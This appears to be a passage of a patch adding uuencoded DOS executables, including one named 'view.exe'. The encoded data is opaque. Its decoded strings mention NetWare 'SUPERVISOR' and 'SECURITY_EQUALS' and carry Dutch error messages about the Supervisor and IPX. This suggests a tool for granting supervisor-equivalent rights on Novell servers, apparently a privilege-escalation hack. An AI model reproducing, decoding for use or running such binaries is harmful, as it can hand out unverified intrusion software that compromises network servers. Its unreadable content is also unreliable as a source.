+M"O]V"IH/ *L#@\0"B4;)QD; &(I&RP0,B$:_QD:^ "O)48U._A91*N1 0%"-
+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
+M[ 0JP%"P E":" "/ XOE7<N058OL@^Q&QD;^%HI&!HA&_\=&_ ( QT:\/@"-
+M1KP64(U&_!90L.-0F@D D .#Q J)1KH+P'5RBT82"T80=!C_=L#_=KZ:# "J
+M X/$!,1>$":)!R:)5P*+1@X+1@QT$?]VPIH/ *L#@\0"Q%X,)HD'BT8*"T8(
+M=!.-1L064/]V"O]V")J*&J@ @\0(BT86"T84=!2X!P!0C4;T%E#_=A;_=A2:
+MM!NH "O B^5=RU6+[+3PBD8&BE8(S2&T %W+58OL'E97BF8&Q78(Q'X,S2&T
+M %]>'UW+ %6+[(/L<L9&S#7_=@J:#P"K X/$ HE&S?]V"/]V!IKJ&J@ @\0$
+MB4:.B$;/4/]V"/]V!HU&T!90FK0;J "#Q J+1HX%! ")1LK'1I(V (U&DA90
+MC4;*%E"PXU":"0"0 X/$"HE&D O =1?_=I;_=I2:# "J \1>#":)!R:)5P(K
+MP(OE7<N058OL@>R$ %:*1@:(1HC_=@R:#P"K X/$ HE&B?]V"O]V")KJ&J@ 
+M@\0$B89^__]V$/]V#IKJ&J@ @\0$B4:$_W84_W82FNH:J "#Q 2)1OZ*AG[_
+MB$:+_[9^__]V"O]V"(U&C!90FK0;J "#Q J*1H2+MG[_@\8&B$*&_W:$_W80
+M_W8.C4*'%E":M!NH (/$"O]V%IH/ *L#@\0"BW:$ [9^_X/&!XU:AHD'BD;^
+M1D:(0H:-1 &)1H+_=O[_=A3_=A*+\(U"AA90FK0;J "#Q J+1OX#1H0#AG[_
+M!0@ B4:&QT:   "-1H 64(U&AA90L.-0F@D D .#Q J)AGS_7HOE7<M5B^R+
+M7@B&WXM&!H;$B]"+PUW+58OLBT8&AL1=RU6+[!Y65XI&!L5V"(M.#,1^#HM6
+M$K3RS2&T %]>'UW+                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                     $U3(%)U;BU4:6UE($QI8G)A<GD@+2!#;W!Y<FEG
+M:'0@*&,I(#$Y.#@L($UI8W)O<V]F="!#;W)P$0!-86IO<B!2979I<VEO;B @
+M(" Z("5D"@!-:6YO<B!2979I<VEO;B @(" Z("5D"@!-87@N($-O;FYE8W1I
+M;VYS(" Z("5D"@!!=FPN($-O;FYE8W1I;VYS(" Z("5D"@ * $-O;7!L971I
+M;VX@0V]D92 @(#H@)60* $-O;FYE8W1I;VX@3G5M8F5R(#H@)60* $]B:F5C
+M="!.86UE(" @(" @(#H@)7,* $]B:F5C="!4>7!E(" @(" @(#H@)60* $]B
+M:F5C="!)1" @(" @(" @(#H@)60* %-%0U5225197T5154%,4P!#;VUP;&5T
+M:6]N($-O9&4@(" Z("5D"@!.971W;W)K($%D9')E<W,@(" Z(  E,#)8  H 
+M3F]D92!!9&1R97-S(" @(" @.B  )3 R6  * %-O8VME="!.=6UB97(@(" @
+M(#H@)60*  H 0V]N;F5C=&EO;B!)1" @(" @.B E9 H 1FEL97-E<G9E<B @
+M(" @(" @.B E<PH 3D547T%$1%)%4U, 0V]M<&QE=&EO;B!#;V1E(" @.B E
+M9 H 3F5T=V]R:R!!9&1R97-S(" @.B  )3 R6  * $YO9&4@061D<F5S<R @
+M(" @(#H@ "4P,E@ "@!#;VUP;&5T:6]N($-O9&4@(" Z("5D"@!);6UE9&EA
+M=&4@061D<F5S<R Z(  E,#)8  H 4U5015)625-/4@ * $-O;7!L971I;VX@
+M0V]D92 @(#H@)60* $-O;FYE8W1I;VX@3G5M8F5R(#H@)60* $]B:F5C="!.
+M86UE(" @(" @(#H@)7,* $]B:F5C="!4>7!E(" @(" @(#H@)60* $]B:F5C
+M="!)1" @(" @(" @(#H@)60* %-54$525DE33U( 0V]M<&QE=&EO;B!#;V1E
+M(" @.B E9 H 3F5T=V]R:R!!9&1R97-S(" @.B  )3 R6  * $YO9&4@061D
+M<F5S<R @(" @(#H@ "4P,E@ "@!3;V-K970@3G5M8F5R(" @(" Z("5D"@ *
+M*@ N  H *@!#;VUP;&5T:6]N($-O9&4@(" Z("5D"@!/8FIE8W0@3F%M92 @
+M(" @(" Z("5S"@!/8FIE8W0@240@(" @(" @(" Z("5D"@!355!%4E9)4T]2
+M %-54$525DE33U( 4T5#55))5%E?15%504Q3 %1%1$I%7U9!3E]%4P!#;VUP
+M;&5T:6]N($-O9&4@(" Z("5D"@ *1&%N:R!U('9O;W(@=7<@86%N9&%C:'0N
+M+BX 17)R;W(Z($1E(%-U<&5R=FES;W(@:7,@;FEE="!I;F=E;&]G9"XN+@!%
+M<G)O<CH@3D546"!I<R!N:65T(&=E;&%D96XN+BX* $5R<F]R.B!)4%@@:7,@
+M;FEE="!G96QA9&5N+BXN"@ '"  (!@0.! 4, 0<+#PH(#P@,# D$ 0X$!@($
+M  H+"0(/"P$- @$)!0X'   "!@8 !P,( @D##P</# \&! H  @,*"PT( PH!
+M!PP/ 0@)#0D!"00.! P%!0P("P(#"0X'!P8)#@\," T!"@8.#0 '!PH  0\%
+M! L'"PX,"04- 0L- 0,%#0X& P +"P\#!@0)#0H# 00)! @#"PX%  4"# L-
+M!0T%#0(-"0H,"@ + P4#!@D% 0X.  X( @T" @ $#P@%"08(!@L*"P\ !P((
+M# <#"@$$ @4/!PH,#@4) PX' 0(. 0\$"@8,!@\$ P ,  ,&#P@'"P(-# 8*
+M"@@-2)-&9Y@]YHVW$'HF6KFQ-6L/U7"N^ZT1]$?<I^S/4, /" 4'# (."0 !
+M!@T#! L* @P.!@\  0@- PH$"0L%!P4""0\,! T #@H&" L! P</#0(&!P@%
+M"0 $# ,!"@L.!0X""PT*!P (!@0!#PP#"0@"#PH%"08,  L!#0<#! X."  )
+M! L"!PP#"@4- 08/ 00("@T+!PX%#P,)  (&# 4## @+ @X*! $-  8'#PD&
+M  L.#00,#P<"" H!!0,)"P4*#@\!#  &! () PT'" <""@ ." \$# L) 04-
+M P8'! \)!0$,"P #" X""@8-"00(  H# 0P%#P<""PX&#0D%! <." ,!#0L,
+M @ /!@H)"@L-!0,/  $," <&! X" PX/ @T,! 4)!@ !"P<*"     #C 0  
+M[P,                                                         
+M                                            I 8[0U]&24Q%7TE.
+M1D\                                  !0 @8&! 0$             
+M                    0 ?O T,                 _____] 2       6
+M @(8#0D,# P'"!86_Q(-$@+_                                    
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                  !N!^\#  !N!^\# 0          
+M     @$              @(             A ,              @0     
+M                                                            
+M                                                            
+M                                                            
+M                                                       !   "
+M                                                            
+M                                                            
+M                                  !2#N\#*&YU;&PI "AN=6QL*0 K
+M+2 C                         "      C@*H (X"J ". J@ C@*H (X"
+MJ        0$                  .X%J "O Z\#KP.O Z\#KP.O Z\#KP.O
+M Z\#KP.O Z\#KP.O Z\#KP.O ^\#/#Q.35-'/CX  %(V,# P#0HM('-T86-K
+M(&]V97)F;&]W#0H  P!2-C P,PT*+2!I;G1E9V5R(&1I=FED92!B>2 P#0H 
+M"0!2-C P.0T*+2!N;W0@96YO=6=H('-P86-E(&9O<B!E;G9I<F]N;65N= T*
+M /P #0H _P!R=6XM=&EM92!E<G)O<B   @!2-C P,@T*+2!F;&]A=&EN9R!P
+M;VEN="!N;W0@;&]A9&5D#0H  0!2-C P,0T*+2!N=6QL('!O:6YT97(@87-S
+-:6=N;65N= T* /___V5D
+ 
+end
+
+
+------------------------------------------------------------------------
+
+begin 777 view.exe
+M35K= 1< <@ @ )L ___8 @ (M7DX !< '@    $ $ "O @X KP(, *\""@"O
+M FX!  !5 0  '@$  !(!  #]    ]@   ,(   "V    K@   *8   ">    
+M@@   '4   !H    6P   $X    Z    ,P   "L    C    &P    X    )
+M    %P#< 3X W %V .8!3@#F 28 Y@&F / !AP#P 68 \ %) / !+ #P ?P 
+M_ '2 /P!G0#\ 9( _ %O /P!3@#\ 3T _ $K /P!&@#\ ?  & )# !< 8P 7
+M &L %P"S !< N@ 7 +\ %P#: !< X  7 ., %P#U !< ^@ 7 (@!& +Y 1< 
+M<@(7 (8"%P#, A< U0(7 #4%%P /!A< ?@87 &P&%P!0!A< " "O L '& *Z
+M!Q@"(@D8 B\(%P *"!< Z0<7 &4'%P!8!Q< 30<7 #8'%P L!Q< '@<7 '0(
+M%P!D"A< 4@H7 $4*%P U"A< _0D7 ,L)%P"X"1< IPD7 ! )%P $"1< ]0@7
+M .D(%P#("A< !0L7 )T/%P"(#Q< $@"O G83%P#?$A< <Q(7 #42%P L%A< 
+MSQ<7 /L7%P"S&1< 4 D8 E0)& )8"1@"7 D8 F )& )/&Q<             
+M                      !5B^RX @":D@(7 )H0 .T!"L!T ^E/ ;A( +H/
+M E)0N ( N@\"4E"X  "Z#P)24+A$ +H/ E)0F@\ W &#Q! +P'4#Z1H!N$( 
+M'E":, 87 (/$!+A' !Y0FC &%P"#Q 2X8  >4)HP!A< @\0$N(, 'E":, 87
+M (/$!+B( !Y0FC &%P"#Q 3'1OX  (X&N@DFQP9&    Z9< N#H N@\"4E"X
+M- "Z#P)24+@X +H/ E)0N 0 N@\"4E F_S9& )H" / !@\02C@:^"2:C0@ +
+MP'55C@; "2:#/C@  75)N $ 4+BR !Y0N+T 'E F_S8X +@$ +H/ E)0FE0 
+MY@&#Q!".!KX))J-"  O =1JX! "Z#P)24+C- !Y0FC &%P"#Q C'1OX! (X&
+MN@DF_P9& (X&O DFH0( C@:Z"28Y!D8 <P/I4_^#?OX =0VXUP >4)HP!A< 
+M@\0$N.4 ZPJ0N.D ZP20N D!'E":, 87 (OE7<L                     
+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
